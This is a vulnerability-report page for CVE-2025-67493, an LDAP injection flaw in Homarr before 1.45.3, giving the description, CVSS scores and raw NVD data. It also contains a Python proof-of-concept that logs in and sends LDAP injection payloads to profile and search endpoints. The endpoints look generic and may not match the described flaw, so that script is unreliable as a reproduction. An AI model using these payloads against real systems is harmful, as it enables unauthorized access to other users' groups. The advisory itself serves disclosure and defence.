Security Vulnerability Report
中文
CVE-2025-67493 CVSS 7.5 HIGH

CVE-2025-67493

Published: 2025-12-17 21:16:16
Last Modified: 2026-01-30 18:32:21
Source: [email protected]

Description

Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups of other users due to missing sanitization of inputs in ldap search query. The vulnerability could impact all instances using ldap authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:homarr:homarr:*:*:*:*:*:*:*:* - VULNERABLE
Homarr < 1.45.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67493 PoC - Homarr LDAP Injection Privilege Escalation # This PoC demonstrates the LDAP injection vulnerability in Homarr < 1.45.3 # Note: This is for educational and authorized testing purposes only import requests import json TARGET_URL = "http://target-homarr-instance.com" ATTACKER_USERNAME = "attacker" ATTACKER_PASSWORD = "password123" # LDAP Injection payloads to test LDAP_INJECTION_PAYLOADS = [ # Escape the current user context "admin*)(objectClass=*", "*)(memberOf=*)", # Bypass authentication with wildcard "*)(|(objectClass=*))", # Enumerate all groups "*)(objectClass=person)(memberOf=*", # Extract sensitive group memberships "*))(|(memberOf=CN=Admin*", ] def test_ldap_injection(): """Test for LDAP injection vulnerability in Homarr authentication""" session = requests.Session() # Login with legitimate credentials first login_data = { "username": ATTACKER_USERNAME, "password": ATTACKER_PASSWORD } response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data) if response.status_code != 200: print(f"[-] Login failed: {response.status_code}") return False print("[+] Successfully authenticated") # Test LDAP injection in user profile update for payload in LDAP_INJECTION_PAYLOADS: profile_data = { "username": payload, "displayName": f"Test User {payload[:20]}", "email": f"test-{hash(payload)}@example.com" } response = session.put( f"{TARGET_URL}/api/user/profile", json=profile_data, headers={"Content-Type": "application/json"} ) if response.status_code == 200: # Check if the response contains unexpected group information data = response.json() if "memberOf" in str(data) or "groups" in str(data): print(f"[!] Potential LDAP Injection found with payload: {payload}") print(f"[+] Response may contain unauthorized group data") print(f"[+] Response preview: {str(data)[:200]}") return True # Alternative: Test via LDAP search functionality search_payloads = [ "*", "*)*(", "admin*", "*)(objectClass=*" ] for search_term in search_payloads: response = session.get( f"{TARGET_URL}/api/ldap/search", params={"query": search_term} ) if response.status_code == 200: data = response.json() # Check if results exceed expected scope if isinstance(data, list) and len(data) > 10: print(f"[!] LDAP search returned {len(data)} results for query: {search_term}") print(f"[+] This may indicate an injection vulnerability") return True print("[-] No obvious LDAP injection detected") return False if __name__ == "__main__": print("CVE-2025-67493 LDAP Injection Test") print("=" * 50) test_ldap_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67493", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:15.627", "lastModified": "2026-01-30T18:32:21.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups of other users due to missing sanitization of inputs in ldap search query. The vulnerability could impact all instances using ldap authentication where a malicious actor had access to a user account. Version 1.45.3 has a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:homarr:homarr:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.45.3", "matchCriteriaId": "CC064DC6-491E-4B5B-9D5F-75126BC6EB5C"}]}]}], "references": [{"url": "https://github.com/homarr-labs/homarr/security/advisories/GHSA-59gp-q3xx-489q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.